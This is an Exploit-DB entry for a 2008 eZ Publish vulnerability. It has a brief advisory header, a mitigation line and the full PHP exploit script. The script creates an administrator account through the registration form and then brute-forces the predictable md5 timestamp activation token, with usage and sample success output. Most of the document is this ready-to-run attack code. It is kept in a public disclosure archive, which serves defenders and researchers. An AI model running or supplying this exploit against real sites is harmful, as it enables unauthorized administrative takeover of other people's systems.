eZ Publish privilege escalation and weak activation token for new user exploit

vendor:

eZ Publish

by:

s4avrd0w

7.5

CVSS

HIGH

Privilege Escalation and Weak Activation Token

264

CWE

Product Name: eZ Publish

Affected Version From: 3.5.2006

Affected Version To: 3.9.2002

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

eZ Publish privilege escalation and weak activation token for new user exploit

eZ Publish is vulnerable to privilege escalation and weak activation token for new user exploit. The vulnerability is present in versions >= 3.5.6 and is resolved in 3.9.5, 3.10.1, 4.0.1. The vulnerable code in version 3.9.2 is $hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) ) and in version 4.0.1 is $hash = md5( time() . $user->attribute( 'contentobject_id' ) ). The exploit can be used by running the script eZPublish_create_admin_exploit.php with the required parameters -u, -p, -s and optional parameters -e and -t.

Mitigation:

Upgrade to the latest version of eZ Publish

Source

Exploit-DB raw data:

<?php

/*
	eZ Publish privilege escalation and weak activation token for new user exploit by s4avrd0w [s4avrd0w@p0c.ru]
	Versions affected >= 3.5.6
	eZ Publish privilege escalation resolved in 3.9.5, 3.10.1, 4.0.1
	More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible

	eZ Publish weak activation token for new user not resolved now (zero-day).
	Vulnerable code in the version 3.9.2:
		$hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) );
	Vulnerable code in the version 4.0.1:
		$hash = md5( time() . $user->attribute( 'contentobject_id' ) );
	
	* tested on version 3.9.2

	usage: 

	# ./eZPublish_create_admin_exploit.php -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]

	The options are required:
	 -u Login of the new admin on eZ Publish
	 -p Password of the new admin on eZ Publish
	 -s Target for privilege escalation

	The options are optional:
	 -t Unix timestamp for a date on target eZ Publish server
		This option is required in a case when on a target server incorrect time is established.
		Default is unix timestamp for a date on local computer.
	 -e Email of the new admin on eZ Publish
		Default is anybody@localhost.localhost.

	example:

	# ./eZPublish_create_admin_exploit.php -u=admin -p=P@ssw0rd -s=http://127.0.0.1/ -e=my_mail@google.com -t=1229194235
	[+] Phase 1 successfully finished
	[+] Use timestamp: 1229194235
	[+] Begin bruteforce...
	....................
	[+] Phase 2 successfully finished

	[+] Exploiting is finished successfully
	[+] Login in system using admin/P@ssw0rd

*/

function help_argc($script_name)
{
print "
usage:

# ./".$script_name." -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]

The options are required:
 -u Login of the new admin on eZ Publish
 -p Password of the new admin on eZ Publish
 -s Target for privilege escalation

The options are optional:
 -t Unix timestamp for a date on target eZ Publish server
	(default is unix timestamp for a date on local computer)
 -e Email of the new admin on eZ Publish
	(default is anybody@localhost.localhost)

example:

# ./".$script_name." -u=admin -p=P@ssw0rd -s=http://127.0.0.1/
[+] Phase 1 successfully finished
[+] Use timestamp: 1229194235
[+] Begin bruteforce...
....................
[+] Phase 2 successfully finished

[+] Exploiting is finished successfully
[+] Login in system using admin/P@ssw0rd
";
}

function successfully($login,$password)
{
print "
[+] Phase 2 successfully finished

[+] Exploiting is finished successfully
[+] Login in system using $login/$password
";
}

if (($argc != 4 && $argc != 5 && $argc != 6) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
	help_argc($argv[0]);
	exit(0);
}
else
{
	$ARG = array(); 
	foreach ($argv as $arg) { 
		if (strpos($arg, '-') === 0) { 
			$key = substr($arg,1,1);
			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
		} 
	}

	if ($ARG[u] && $ARG[p] && $ARG[s])
	{

		if (!$ARG[e]) $ARG[e] = "anybody@localhost.localhost";

			$post_fields = array(
				'ContentObjectAttribute_data_user_login_30' => $ARG[u],
				'ContentObjectAttribute_data_user_password_30' => $ARG[p],
				'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
				'ContentObjectAttribute_data_user_email_30' => $ARG[e],
				'UserID' => '14',
				'PublishButton' => '1'
			);

		$headers = array(
		    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
		    'Referer' => $ARG[s]
		);

		$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
		$res_http->addPostFields($post_fields);
		$res_http->addHeaders($headers);
		try {
			if ($ARG[t]) { $time = $ARG[t]; } else { $time = mktime( ); }
    			$response = $res_http->send()->getBody();

			if (eregi("success", $response) || eregi("Fatal error", $response))
			{
				print "[+] Phase 1 successfully finished\n";
				print "[+] Use timestamp: $time\n";
				print "[+] Begin bruteforce...\n";

				for ($i = $time; $i<$time+100; $i++)
				{
					print ".";
					$hash = md5( $i . "14" );
					$res_http = new HttpRequest($ARG[s]."/user/activate/".$hash, HttpRequest::METH_GET);
					$res_http->addHeaders($headers);
					try {
						$response = $res_http->send()->getBody();

						if (eregi("Your account is now activated", $response))
						{
							successfully($ARG[u],$ARG[p]);
							exit(1);
						}


					} catch (HttpException $exception) {
						print "\n[-] Not connected";
						exit(0);
					}
				}
				print "\n[-] Exploit failed";
			}
			else
			{
				print "[-] Exploit failed";
			}

		} catch (HttpException $exception) {

			print "[-] Not connected";
			exit(0);

		}

	}
	else
	{
		help_argc($argv[0]);
		exit(0);
	} 
}

?>

# milw0rm.com [2008-12-15]